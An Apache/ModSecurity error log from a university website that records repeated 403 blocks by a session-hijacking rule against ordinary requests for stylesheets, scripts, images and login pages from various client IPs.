[Mon Aug 28 08:14:32.049619 2023] [:error] [pid 37803] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/fonts/glyphicons-halflings-regular.woff2"] [unique_id "ZOv0@MCo-f0AAJOr@AAAAAAL"]
[Mon Aug 28 08:14:32.061399 2023] [:error] [pid 38059] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOv0@MCo-f0AAJSr2x8AAAAO"]
[Mon Aug 28 08:14:32.151516 2023] [:error] [pid 38114] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv0@MCo-f0AAJTine4AAAAE"]
[Mon Aug 28 08:14:32.195538 2023] [:error] [pid 38339] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/fonts/glyphicons-halflings-regular.woff"] [unique_id "ZOv0@MCo-f0AAJXDU3UAAAAK"]
[Mon Aug 28 08:14:32.268295 2023] [:error] [pid 38150] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/fonts/glyphicons-halflings-regular.ttf"] [unique_id "ZOv0@MCo-f0AAJUGIY8AAAAC"]
[Mon Aug 28 08:14:32.409525 2023] [:error] [pid 38059] [client 36.75.64.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv0@MCo-f0AAJSr2yAAAAAO"]
[Mon Aug 28 08:14:45.237028 2023] [:error] [pid 38114] [client 180.253.231.163] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv1BcCo-f0AAJTinfEAAAAE"]
[Mon Aug 28 08:15:17.861739 2023] [:error] [pid 38114] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv1JcCo-f0AAJTinfgAAAAE"]
[Mon Aug 28 08:15:17.866752 2023] [:error] [pid 37803] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv1JcCo-f0AAJOr@AcAAAAL"]
[Mon Aug 28 08:15:17.871712 2023] [:error] [pid 37539] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv1JcCo-f0AAJKjaDEAAAAG"]
[Mon Aug 28 08:15:18.443393 2023] [:error] [pid 38149] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv1JsCo-f0AAJUFNWoAAAAA"]
[Mon Aug 28 08:15:18.499175 2023] [:error] [pid 38303] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv1JsCo-f0AAJWfZMAAAAAI"]
[Mon Aug 28 08:15:18.507278 2023] [:error] [pid 37803] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv1JsCo-f0AAJOr@AgAAAAL"]
[Mon Aug 28 08:15:18.512393 2023] [:error] [pid 38150] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOv1JsCo-f0AAJUGIZkAAAAC"]
[Mon Aug 28 08:15:18.516194 2023] [:error] [pid 38114] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOv1JsCo-f0AAJTinfkAAAAE"]
[Mon Aug 28 08:15:18.519901 2023] [:error] [pid 38059] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv1JsCo-f0AAJSr2ysAAAAO"]
[Mon Aug 28 08:15:18.524050 2023] [:error] [pid 38303] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv1JsCo-f0AAJWfZMEAAAAI"]
[Mon Aug 28 08:15:18.563851 2023] [:error] [pid 38059] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv1JsCo-f0AAJSr2ywAAAAO"]
[Mon Aug 28 08:15:18.580375 2023] [:error] [pid 38340] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv1JsCo-f0AAJXEm-YAAAAM"]
[Mon Aug 28 08:15:18.598646 2023] [:error] [pid 38149] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv1JsCo-f0AAJUFNWsAAAAA"]
[Mon Aug 28 08:15:18.602440 2023] [:error] [pid 38339] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv1JsCo-f0AAJXDU30AAAAK"]
[Mon Aug 28 08:15:18.607509 2023] [:error] [pid 38303] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOv1JsCo-f0AAJWfZMIAAAAI"]
[Mon Aug 28 08:15:18.635276 2023] [:error] [pid 37803] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOv1JsCo-f0AAJOr@AkAAAAL"]
[Mon Aug 28 08:15:18.641149 2023] [:error] [pid 38059] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv1JsCo-f0AAJSr2y0AAAAO"]
[Mon Aug 28 08:15:18.644174 2023] [:error] [pid 38149] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOv1JsCo-f0AAJUFNWwAAAAA"]
[Mon Aug 28 08:15:18.685293 2023] [:error] [pid 38303] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOv1JsCo-f0AAJWfZMMAAAAI"]
[Mon Aug 28 08:15:18.689349 2023] [:error] [pid 37803] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOv1JsCo-f0AAJOr@AoAAAAL"]
[Mon Aug 28 08:15:18.707218 2023] [:error] [pid 38149] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOv1JsCo-f0AAJUFNW0AAAAA"]
[Mon Aug 28 08:15:18.822106 2023] [:error] [pid 38059] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOv1JsCo-f0AAJSr2y4AAAAO"]
[Mon Aug 28 08:15:18.826661 2023] [:error] [pid 38150] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOv1JsCo-f0AAJUGIZoAAAAC"]
[Mon Aug 28 08:15:18.829327 2023] [:error] [pid 38114] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOv1JsCo-f0AAJTinfoAAAAE"]
[Mon Aug 28 08:15:18.847003 2023] [:error] [pid 38340] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv1JsCo-f0AAJXEm-cAAAAM"]
[Mon Aug 28 08:15:18.850993 2023] [:error] [pid 38303] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOv1JsCo-f0AAJWfZMQAAAAI"]
[Mon Aug 28 08:15:18.852971 2023] [:error] [pid 38059] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOv1JsCo-f0AAJSr2y8AAAAO"]
[Mon Aug 28 08:15:19.085505 2023] [:error] [pid 38114] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv1J8Co-f0AAJTinfsAAAAE"]
[Mon Aug 28 08:15:19.229094 2023] [:error] [pid 38150] [client 180.244.133.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv1J8Co-f0AAJUGIZsAAAAC"]
[Mon Aug 28 08:16:47.275995 2023] [:error] [pid 38375] [client 114.79.49.176] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOv1f8Co-f0AAJXn9rkAAAAB"]
[Mon Aug 28 08:16:47.547243 2023] [:error] [pid 37803] [client 114.79.49.176] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv1f8Co-f0AAJOr@BoAAAAL"]
[Mon Aug 28 08:16:57.388012 2023] [:error] [pid 38303] [client 114.79.49.176] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOv1icCo-f0AAJWfZNkAAAAI"]
[Mon Aug 28 08:16:57.637309 2023] [:error] [pid 38375] [client 114.79.49.176] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv1icCo-f0AAJXn9rwAAAAB"]
[Mon Aug 28 08:17:00.264435 2023] [:error] [pid 38375] [client 114.122.105.240] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOv1jMCo-f0AAJXn9r4AAAAB"]
[Mon Aug 28 08:17:00.328648 2023] [:error] [pid 38149] [client 114.122.105.240] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOv1jMCo-f0AAJUFNYIAAAAA"]
[Mon Aug 28 08:17:00.334526 2023] [:error] [pid 38303] [client 114.122.105.240] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOv1jMCo-f0AAJWfZNsAAAAI"]
[Mon Aug 28 08:17:00.448940 2023] [:error] [pid 38149] [client 114.122.105.240] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOv1jMCo-f0AAJUFNYMAAAAA"]
[Mon Aug 28 08:17:00.636741 2023] [:error] [pid 38303] [client 114.122.105.240] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOv1jMCo-f0AAJWfZNwAAAAI"]
[Mon Aug 28 08:17:53.291658 2023] [:error] [pid 37803] [client 114.122.70.137] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv1wcCo-f0AAJOr@CkAAAAL"]
[Mon Aug 28 08:18:50.664536 2023] [:error] [pid 37539] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv1@sCo-f0AAJKjaFkAAAAG"]
[Mon Aug 28 08:18:53.289442 2023] [:error] [pid 38388] [client 114.122.105.240] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv1-cCo-f0AAJX0cBYAAAAR"]
[Mon Aug 28 08:18:55.946804 2023] [:error] [pid 38149] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv1-8Co-f0AAJUFNZ0AAAAA"]
[Mon Aug 28 08:19:16.507612 2023] [:error] [pid 38386] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOv2FMCo-f0AAJXyN3EAAAAM"]
[Mon Aug 28 08:19:26.257657 2023] [:error] [pid 38149] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/prosedurpmb"] [unique_id "ZOv2HsCo-f0AAJUFNaQAAAAA"]
[Mon Aug 28 08:19:34.796368 2023] [:error] [pid 38379] [client 114.79.49.176] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv2JsCo-f0AAJXrIpEAAAAP"]
[Mon Aug 28 08:19:35.055343 2023] [:error] [pid 38338] [client 114.79.49.176] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv2J8Co-f0AAJXCvswAAAAJ"]
[Mon Aug 28 08:21:16.751348 2023] [:error] [pid 38388] [client 140.213.98.7] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOv2jMCo-f0AAJX0cDoAAAAR"]
[Mon Aug 28 08:21:16.781009 2023] [:error] [pid 38379] [client 140.213.98.7] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOv2jMCo-f0AAJXrIqUAAAAP"]
[Mon Aug 28 08:21:16.788117 2023] [:error] [pid 38149] [client 140.213.98.7] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOv2jMCo-f0AAJUFNbYAAAAA"]
[Mon Aug 28 08:21:16.862911 2023] [:error] [pid 38378] [client 140.213.98.7] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOv2jMCo-f0AAJXqX2kAAAAF"]
[Mon Aug 28 08:21:43.450482 2023] [:error] [pid 38388] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOv2p8Co-f0AAJX0cD8AAAAR"]
[Mon Aug 28 08:21:43.453562 2023] [:error] [pid 37539] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOv2p8Co-f0AAJKjaHoAAAAG"]
[Mon Aug 28 08:21:43.465528 2023] [:error] [pid 38338] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOv2p8Co-f0AAJXCvuUAAAAJ"]
[Mon Aug 28 08:21:43.472568 2023] [:error] [pid 38114] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOv2p8Co-f0AAJTinisAAAAE"]
[Mon Aug 28 08:21:45.784578 2023] [:error] [pid 38386] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOv2qcCo-f0AAJXyN48AAAAM"]
